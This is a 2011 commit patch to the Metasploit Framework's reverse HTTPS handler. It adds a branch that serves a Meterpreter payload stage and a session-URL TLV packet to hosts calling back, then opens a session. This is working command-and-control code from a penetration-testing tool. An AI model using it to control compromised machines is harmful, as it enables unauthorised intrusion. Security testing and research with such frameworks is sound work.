From c0ddf56ec038ee8d69d1f7950fb7e44d6b9dbddd Mon Sep 17 00:00:00 2001
From: James Lee <James_Lee@rapid7.com>
Date: Fri, 16 Sep 2011 21:31:21 +0000
Subject: [PATCH] hmf, missed this one, too.  see #5288

git-svn-id: file:///home/svn/framework3/trunk@13743 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/handler/reverse_https.rb | 30 +++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)

diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb
index 1b747d729a..605eb759d5 100644
--- a/lib/msf/core/handler/reverse_https.rb
+++ b/lib/msf/core/handler/reverse_https.rb
@@ -126,6 +126,36 @@ protected
 
 		# Process the requested resource.
 		case req.relative_resource
+			when /^\/INITJM/
+				conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
+				url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
+				#$stdout.puts "URL: #{url.inspect}"
+
+				blob = ""
+				blob << obj.generate_stage
+
+				# This is a TLV packet - I guess somewhere there should be API for building them
+				# in Metasploit :-)
+				packet = ""
+				packet << ["core_switch_url\x00".length + 8, 0x10001].pack('NN') + "core_switch_url\x00"
+				packet << [url.length+8, 0x1000a].pack('NN')+url
+				packet << [12, 0x2000b, datastore['SessionExpirationTimeout'].to_i].pack('NNN')
+				packet << [12, 0x20019, datastore['SessionCommunicationTimeout'].to_i].pack('NNN')
+				blob << [packet.length+8, 0].pack('NN') + packet
+
+				resp.body = blob
+				conn_ids << conn_id
+
+				# Short-circuit the payload's handle_connection processing for create_session
+				create_session(cli, {
+					:passive_dispatcher => obj.service,
+					:conn_id            => conn_id,
+					:url                => url,
+					:expiration         => datastore['SessionExpirationTimeout'].to_i,
+					:comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
+					:ssl                => false
+				})
+
 			when /^\/A?INITM?/
 
 				url = ''